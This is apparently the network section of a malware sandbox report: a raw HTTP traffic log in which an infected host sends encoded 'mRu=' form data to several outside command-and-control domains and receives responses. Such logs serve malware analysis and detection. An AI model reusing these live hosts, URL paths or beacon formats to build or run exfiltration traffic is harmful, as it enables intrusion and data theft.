                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00
                                                                                                                            Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            65192.168.11.204978447.52.221.880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:50.720370054 CET477OUTGET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:33:51.050966024 CET390INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:50 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Length: 203
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            66192.168.11.2049785154.38.64.680
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:56.390572071 CET741OUTPOST /6yjb/ HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.qiusuo.vip
                                                                                                                            Referer: http://www.qiusuo.vip/6yjb/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 32 59 64 57 52 49 74 6a 69 38 78 78 31 6f 42 44 68 43 50 52 48 42 37 4c 47 49 34 65 6d 38 53 69 4a 4d 49 54 66 69 37 6a 55 33 42 5a 79 71 72 35 70 4c 77 33 52 64 58 41 70 6d 6e 30 32 4a 57 4e 34 65 4f 47 52 67 53 70 45 36 41 7a 79 31 62 4f 30 6a 54 4a 4a 57 73 49 45 72 35 78 73 6f 30 39 64 2f 30 61 51 54 73 69 4a 59 36 6c 5a 4d 6d 73 39 61 54 32 72 66 58 66 55 6b 53 78 46 4a 4c 4c 41 38 74 6c 63 2f 73 63 37 36 50 35 30 56 35 72 2b 73 32 46 64 4f 6d 67 78 64 71 6e 33 79 61 72 64 77 43 7a 34 55 57 68 39 78 78 36 53 42 61 6f 61 73 32 6f 44 67 3d 3d
                                                                                                                            Data Ascii: mRu=YalTSGWPO59z2YdWRItji8xx1oBDhCPRHB7LGI4em8SiJMITfi7jU3BZyqr5pLw3RdXApmn02JWN4eOGRgSpE6Azy1bO0jTJJWsIEr5xso09d/0aQTsiJY6lZMms9aT2rfXfUkSxFJLLA8tlc/sc76P50V5r+s2FdOmgxdqn3yardwCz4UWh9xx6SBaoas2oDg==
                                                                                                                            Nov 12, 2024 15:33:56.719913006 CET535INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:56 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 337
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00
                                                                                                                            Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            67192.168.11.2049786154.38.64.680
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:59.243787050 CET761OUTPOST /6yjb/ HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.qiusuo.vip
                                                                                                                            Referer: http://www.qiusuo.vip/6yjb/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4b 69 69 4a 73 59 54 63 6a 37 6a 54 33 42 5a 35 4b 72 38 71 37 78 37 52 61 65 31 70 6e 62 30 32 49 79 4e 34 66 2b 47 52 58 4f 71 47 71 41 31 36 56 62 4d 33 54 54 4a 4a 57 73 49 45 72 73 73 73 73 51 39 64 4e 67 61 53 79 73 6a 58 49 36 6b 61 4d 6d 73 35 61 54 79 72 66 58 74 55 6c 4f 62 46 50 48 4c 41 39 64 6c 64 72 34 64 31 4b 50 37 36 31 34 75 79 4a 71 42 61 76 47 79 31 74 79 58 37 79 57 4e 56 47 50 70 6c 6d 69 46 2b 69 74 49 57 78 6a 41 59 75 33 7a 65 68 39 45 45 33 42 70 6f 36 48 75 63 6e 4b 76 39 38 38 50 68 73 4d 3d
                                                                                                                            Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmKiiJsYTcj7jT3BZ5Kr8q7x7Rae1pnb02IyN4f+GRXOqGqA16VbM3TTJJWsIErssssQ9dNgaSysjXI6kaMms5aTyrfXtUlObFPHLA9dldr4d1KP7614uyJqBavGy1tyX7yWNVGPplmiF+itIWxjAYu3zeh9EE3Bpo6HucnKv988PhsM=
                                                                                                                            Nov 12, 2024 15:33:59.563903093 CET535INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:59 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 337
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00
                                                                                                                            Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            68192.168.11.2049787154.38.64.680
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:02.109790087 CET6445OUTPOST /6yjb/ HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.qiusuo.vip
                                                                                                                            Referer: http://www.qiusuo.vip/6yjb/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4a 43 69 4a 61 55 54 65 41 54 6a 53 33 42 5a 77 71 72 39 71 37 77 68 52 63 32 35 70 6e 57 42 32 4b 36 4e 71 4a 4b 47 41 31 6d 71 4d 71 41 31 32 31 62 4a 30 6a 54 59 4a 57 38 55 45 72 38 73 73 73 51 39 64 4d 51 61 56 6a 73 6a 56 49 36 6c 5a 4d 6e 74 39 61 54 4b 72 66 66 39 55 6c 4b 68 46 66 6e 4c 4f 39 4e 6c 62 65 73 64 7a 61 50 39 33 56 34 49 79 4a 76 66 61 76 61 55 31 74 33 34 37 7a 4f 4e 52 51 4c 2f 69 47 79 73 73 6a 5a 78 5a 44 62 47 61 63 72 2b 62 69 70 69 46 47 39 6f 67 73 66 6d 41 30 6d 50 75 2b 38 37 67 35 42 6f 78 53 6f 53 63 4c 38 72 48 45 75 63 5a 59 5a 62 38 74 4f 45 62 32 34 46 42 58 4f 4a 6a 39 53 36 72 58 45 59 62 4e 6e 66 37 38 34 33 6c 6f 79 61 7a 52 62 72 31 6c 68 32 77 6b 32 37 44 44 62 6c 51 39 39 2b 5a 66 54 49 48 70 37 70 72 47 7a 31 6b 6b 54 70 69 6c 6a 41 5a 52 6b 79 44 37 6b 63 67 46 51 57 79 64 73 48 48 59 59 72 32 42 33 65 43 6a 52 2b 4e 69 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmJCiJaUTeATjS3BZwqr9q7whRc25pnWB2K6NqJKGA1mqMqA121bJ0jTYJW8UEr8sssQ9dMQaVjsjVI6lZMnt9aTKrff9UlKhFfnLO9NlbesdzaP93V4IyJvfavaU1t347zONRQL/iGyssjZxZDbGacr+bipiFG9ogsfmA0mPu+87g5BoxSoScL8rHEucZYZb8tOEb24FBXOJj9S6rXEYbNnf7843loyazRbr1lh2wk27DDblQ99+ZfTIHp7prGz1kkTpiljAZRkyD7kcgFQWydsHHYYr2B3eCjR+Ni83FdbmV4mYy+pBNxpNuPg7x+4IA7rKyZH+4muRaJgjBsJI4Iv+fHIrYx6wCutM//4bZXsos78r0N45Ihb0Sqt96mJBOqysK91ZiSoe8QGsVRM4BqgoUaRp5u27ogxgsUMbxf3NpbE6jQduZ+8UmMYG24iCC+hOpQ5yyX+mo3KGZprC8Ah468ELUryB1Jks4diQrtWBCaGL+pzVSzpOql1DVChXDhWsEX3RALyEFZFT+tzB0aH0n/ImLDSGGcMF2piu0LxV58M58xeaZxxCbKi1bPWmLRA6qLE21CySuhh5QPU49Gy9aZgtglGjY1r8+ozmzQFHgquV+wEPmh+HVhgOXWdBsrMx7/G/yxnwX1U+rZ6UpFtk7RV1x+4fLYj/0DvpXyq0v2fyXKcSQAl3jo361WfpV3s8FECryjUt8Ww2q+gR+KvqQooS71KFExVB9VY8vHoTf+XrjkUUP0uI9CbabRjqTF6100YnA7MnwAPQwwYGPNJ+7dKyXik5f5UYu+WMN9u86KzfO51gIjOpa9mEHDw553cQN1bnSH/YCLneVLQVxmLyY2Szps4bQelxUaMxg38QwhRuWXnDztSKCMhh8hvR2lO8mnWil+dF1QsAQvfCGSrbtvIHFkX9Pcyba7rQ9XvXMgFqZvaR9gcB2fOjODyFMtZZYAUm [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:34:02.109862089 CET1465OUTData Raw: 31 57 56 6d 35 78 36 72 44 71 5a 33 38 2b 39 42 65 6b 6f 2b 76 30 57 2f 73 55 6d 50 55 61 4d 58 6a 4d 37 42 4e 51 7a 4d 6b 6a 71 51 45 42 64 61 4f 39 50 34 65 6f 36 4b 6e 6f 79 74 50 33 47 69 75 4d 7a 42 6b 73 49 4b 30 4b 58 46 38 32 71 31 63 49
                                                                                                                            Data Ascii: 1WVm5x6rDqZ38+9Beko+v0W/sUmPUaMXjM7BNQzMkjqQEBdaO9P4eo6KnoytP3GiuMzBksIK0KXF82q1cIl5B4NOZvKJDH/pvk8BMAzDNWLzdyGS9jLXjHGv6TzExarA1nXuyQNgQvrVOaQXrocxZqsxU6FGjgighBkqHkxXkasAyLgLSCRAbCrZESrY0eCZbS8gfa86k01TiulHQ3QRW5b0yiO6H6SCWZniiLAFaBC99AtsHX+
                                                                                                                            Nov 12, 2024 15:34:02.441257954 CET535INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:02 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 337
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00
                                                                                                                            Data Ascii: 1o0w~oKU!TQ:!*'UP@D2ll2'%*!$mj$+8e*^ *fm6Rvl)J@N_W%Jrx|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x|$


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            69192.168.11.2049788154.38.64.680
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:04.962903976 CET473OUTGET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.qiusuo.vip
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:34:05.288237095 CET820INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:34:05 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 654
                                                                                                                            Connection: close
                                                                                                                            X-Cache: MISS
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 71 75 64 61 6f 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 70 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <script src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/jquery.js"></script> <script charset="UTF-8" id="LA_COLLECT" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/qudao1.js"></script> ...script type="text/javascript" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/pd.js"></script--> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title>website</title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            70192.168.11.204978984.32.84.3280
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:10.555835009 CET741OUTPOST /h7d8/ HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.pg874.shop
                                                                                                                            Referer: http://www.pg874.shop/h7d8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 69 34 6f 57 61 2b 77 35 6c 43 61 2b 63 36 31 70 74 56 55 70 50 77 76 6b 49 65 39 6c 61 41 6e 6e 56 73 4e 6e 44 6e 6e 4c 74 7a 6a 66 6b 6f 78 78 55 46 52 54 42 32 36 47 67 4a 76 51 72 52 2b 66 70 2b 39 31 33 4c 39 39 6d 35 2f 4a 2f 55 70 6f 43 67 30 73 6a 58 4f 54 58 41 63 61 48 35 59 31 73 56 75 61 74 47 74 70 34 6a 58 39 78 5a 66 56 4d 63 35 66 43 68 50 34 62 32 75 66 30 34 58 74 49 44 30 54 69 53 61 6c 45 31 76 4d 4b 53 42 63 37 30 56 35 63 57 4b 41 79 41 41 51 4c 36 38 7a 4b 4f 6e 41 45 34 2b 59 74 68 6b 78 66 70 74 78 4b 30 5a 2f 77 3d 3d
                                                                                                                            Data Ascii: mRu=389inJRufg4iYi4oWa+w5lCa+c61ptVUpPwvkIe9laAnnVsNnDnnLtzjfkoxxUFRTB26GgJvQrR+fp+913L99m5/J/UpoCg0sjXOTXAcaH5Y1sVuatGtp4jX9xZfVMc5fChP4b2uf04XtID0TiSalE1vMKSBc70V5cWKAyAAQL68zKOnAE4+YthkxfptxK0Z/w==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            71192.168.11.204979084.32.84.3280
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:13.335037947 CET761OUTPOST /h7d8/ HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.pg874.shop
                                                                                                                            Referer: http://www.pg874.shop/h7d8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 6b 6e 6d 31 38 4e 6d 42 50 6e 49 74 7a 6a 51 30 6f 30 73 6b 45 64 54 42 71 59 47 6c 78 76 51 6f 74 2b 66 6f 4f 39 30 41 6e 69 38 32 35 39 63 76 55 76 32 79 67 30 73 6a 58 4f 54 55 38 6d 61 44 56 59 31 2f 39 75 5a 4d 47 75 67 59 6a 59 36 78 5a 66 45 63 63 39 66 43 68 68 34 65 75 41 66 32 41 58 74 4e 48 30 54 7a 53 5a 76 45 31 31 49 4b 54 6f 64 4b 5a 66 67 34 71 45 4e 52 6f 54 57 2b 71 6f 32 63 44 39 64 32 4d 61 62 2b 39 57 31 76 51 46 7a 49 31 43 69 7a 54 36 36 49 49 78 49 49 67 53 2f 66 63 65 73 57 6d 66 69 79 34 3d
                                                                                                                            Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmoknm18NmBPnItzjQ0o0skEdTBqYGlxvQot+foO90Ani8259cvUv2yg0sjXOTU8maDVY1/9uZMGugYjY6xZfEcc9fChh4euAf2AXtNH0TzSZvE11IKTodKZfg4qENRoTW+qo2cD9d2Mab+9W1vQFzI1CizT66IIxIIgS/fcesWmfiy4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            72192.168.11.204979184.32.84.3280
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:34:16.115364075 CET2578OUTPOST /h7d8/ HTTP/1.1
                                                                                                                            Host: www.pg874.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.pg874.shop
                                                                                                                            Referer: http://www.pg874.shop/h7d8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
